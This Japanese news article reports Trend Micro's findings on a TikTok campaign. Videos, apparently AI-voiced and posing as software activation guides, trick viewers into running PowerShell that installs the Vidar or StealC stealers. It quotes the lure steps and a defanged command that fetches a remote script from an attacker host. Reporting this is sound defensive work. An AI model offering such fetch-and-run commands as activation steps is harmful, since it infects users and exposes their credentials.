ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布

佐々山 Tacos

2025.05.26

ClickFix戦術用いるTikTok動画がスティーラーマルウェアを配布

Help Net Security – May 23, 2025

TikTokの巨大なユーザーベースを利用してインフォスティーラーマルウェアVidarおよびStealCを配布する新たなソーシャルエンジニアリングキャンペーンについて、トレンドマイクロが報告。このキャンペーンでは、正規ソフトウェアのアクティベート方法の解説などに見せかけた動画を通じてClickFix戦術を使い、ユーザーに有害なPowerShellコマンドを実行するよう仕向けるという。

ClickFixを用いる攻撃では、偽のCAPTCHA画面を使ってユーザーのクリップボードを乗っ取り、悪意あるスクリプトを実行させるという手口が広く使われている。しかし今回トレンドマイクロが報告した新たなキャンペーンは、TikTokの動画内で視聴者を有害コードの実行に導くというもの。具体的には、Windows OSやMicrosoft Office、CapCut、Spotifyなどのソフトウェアのアクティベート手順と称し、以下のステップに従うよう誘導する。この手順で実行されたPowerShellコマンドはリモートのスクリプトをダウンロード・実行し、これによってVidarまたはStealCがダウンロードされる。

「Windows」キーと「R」キーを押す
powershellとタイプし、「Enter」キーを押す
次のようなコマンドを実行する：irm hxxps://allaivo[.]me/spotify（Spotifyに見せかけたソフトウェアアクティベート手順動画の場合の例）

こうした動画を公開していたTikTokアカウントは複数確認されている（@gitallowed、@zane.houghton、@allaivo2、@sysglow.wow、@alexfixpc、@digitaldreams771）が、どの動画もカメラアングルやPowerShellに使用されるダウンロードURLが微妙に異なるだけで、その他の点は非常に似通っているという。また、動画の音声もAIで生成されている模様。このことから、トレンドマイクロはこれらの動画がAIツールを使って作成されたものである可能性が高いとしている。いずれの動画でもユーザーの誘導は音声を通じて行われており、TikTokプラットフォーム上に検出可能な有害コードやスクリプトが仕込まれているわけではない。トレンドマイクロは、「脅威アクターらはこれを既存の検出メカニズムの回避を試みるために行なっている」と説明。これにより、防御側がこうしたキャンペーンを検出・妨害するのがより難しくなるとした。

このキャンペーンの動画のうち1つは約50万回ほど再生されるなど、TikTokのアルゴリズムの働きにより悪意ある動画であっても幅広いユーザーの目に触れるポテンシャルを秘めている。こうした攻撃のリスクを軽減するにあたり、トレンドマイクロは、特にAI生成のコンテンツに対するセキュリティ意識を高めることが絶対的に必要であると指摘。加えて、PowerShellやその他のシステムユーティリティが関わる普通でないコマンド実行が行われないかモニタリングすることも、悪意ある活動の早期検出に役立つと述べた。同社のレポート記事では、さらに詳しい攻撃チェーンやIoCなどが共有されている。